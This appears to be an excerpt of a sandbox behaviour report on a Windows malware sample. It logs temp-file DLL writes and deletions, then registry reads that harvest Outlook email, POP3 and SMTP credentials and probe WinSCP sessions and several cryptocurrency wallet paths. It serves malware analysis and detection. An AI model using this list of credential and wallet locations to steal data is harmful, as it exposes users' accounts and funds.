Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-debug-l1-1-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-errorhandling-l1-1-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l1-2-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l2-1-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-handle-l1-1-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-heap-l1-1-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-interlocked-l1-1-0.dll size = 17856 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-libraryloader-l1-1-0.dll size = 18744 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-localization-l1-2-0.dll size = 20792 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-memory-l1-1-0.dll size = 18744 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-namedpipe-l1-1-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processenvironment-l1-1-0.dll size = 19248 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-0.dll size = 19392 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-1.dll size = 18744 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-profile-l1-1-0.dll size = 17712 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-rtlsupport-l1-1-0.dll size = 17720 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-string-l1-1-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-1-0.dll size = 20280 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-2-0.dll size = 18744 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-sysinfo-l1-1-0.dll size = 19248 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-timezone-l1-1-0.dll size = 18224 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-util-l1-1-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-conio-l1-1-0.dll size = 19256 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-convert-l1-1-0.dll size = 22328 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-environment-l1-1-0.dll size = 18736 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-filesystem-l1-1-0.dll size = 20280 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-heap-l1-1-0.dll size = 19256 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-locale-l1-1-0.dll size = 18744 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-multibyte-l1-1-0.dll size = 26424 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-runtime-l1-1-0.dll size = 22840 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-string-l1-1-0.dll size = 23488 True 1
Fn
Data
Delete C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp - True 1
Fn
Delete C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp - True 1
Fn
Delete C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-shm - True 1
Fn
Delete C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-wal - True 1
Fn
Delete C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp - True 1
Fn
Delete C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp - True 1
Fn
Delete C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp - True 1
Fn
Delete C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp - True 1
Fn
Registry (133)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\05cb6f136411cf4daf1f74e966b0a7dc - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4b62e5f8c092a64ea9b79fd559a5a15e - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\609a848a708f544697003a34105400ef - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\63cba20b08018a458b6edb5d87fb54da - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\828cd3a417cead4ab3a214070dce1c3d - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\88d17fec23cbdd4fb54ad1d34c0dce09 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a533ec91a4f74549ac2130b6908c8aac - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b70c659765f94740b657fee657d05ab4 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\cce6b8ce16bac4458e5e40e3530d6f1d - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dd7f40a823cda64b92e9a96e9e46e406 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\ - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\monero-project\monero-core - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\BitcoinGold\BitcoinGold-Qt - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\BitCore\BitCore-Qt - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Litecoin\Litecoin-Qt - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\BitcoinABC\BitcoinABC-Qt - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography value_name = MachineGuid, data = 0303d5b4-ffe9-470e-9dd8-7d9ec416e53f, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography value_name = MachineGuid, data = 0303d5b4-ffe9-470e-9dd8-7d9ec416e53f, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography value_name = MachineGuid, data = 0303d5b4-ffe9-470e-9dd8-7d9ec416e53f, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer value_name = Version, data = 8.0.7601.17514, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = Email, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = Email, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = Email, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Server, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = Email, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 User, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Server, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Password, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP Server, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Server, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = Email, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Server, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Password, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 value_name = Email, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary value_name = Email, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\monero-project\monero-core value_name = wallet_path, data = 0 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt value_name = strDataDir, data = 0 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\BitcoinGold\BitcoinGold-Qt value_name = strDataDir, data = 0 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\BitCore\BitCore-Qt value_name = strDataDir, data = 0 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Litecoin\Litecoin-Qt value_name = strDataDir, data = 0 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\BitcoinABC\BitcoinABC-Qt value_name = strDataDir, data = 0 False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\05cb6f136411cf4daf1f74e966b0a7dc - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4b62e5f8c092a64ea9b79fd559a5a15e - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\609a848a708f544697003a34105400ef - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\63cba20b08018a458b6edb5d87fb54da - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\828cd3a417cead4ab3a214070dce1c3d - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\88d17fec23cbdd4fb54ad1d34c0dce09 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a533ec91a4f74549ac2130b6908c8aac - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b70c659765f94740b657fee657d05ab4 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\cce6b8ce16bac4458e5e40e3530d6f1d - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dd7f40a823cda64b92e9a96e9e46e406 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - False 1
Fn
Module (395)
»
Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x76c20000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load GDI32.dll base_address = 0x75ad0000 True 1
Fn
Load MSIMG32.dll base_address = 0x74060000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load WINHTTP.dll base_address = 0x74000000 True 1
Fn
Load kernel32.dll base_address = 0x76c20000 True 7
Fn
Load user32.dll base_address = 0x74f40000 True 3
Fn
Load advapi32.dll base_address = 0x74d40000 True 3
Fn
Load oleaut32.dll base_address = 0x75220000 True 1
Fn
Load gdi32.dll base_address = 0x75ad0000 True 1
Fn
Load ole32.dll base_address = 0x755e0000 True 4
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Load crypt32.dll base_address = 0x759b0000 True 1
Fn
Load crtdll.dll base_address = 0x6c240000 True 1
Fn
Load Gdiplus.dll base_address = 0x73e20000 True 7
Fn
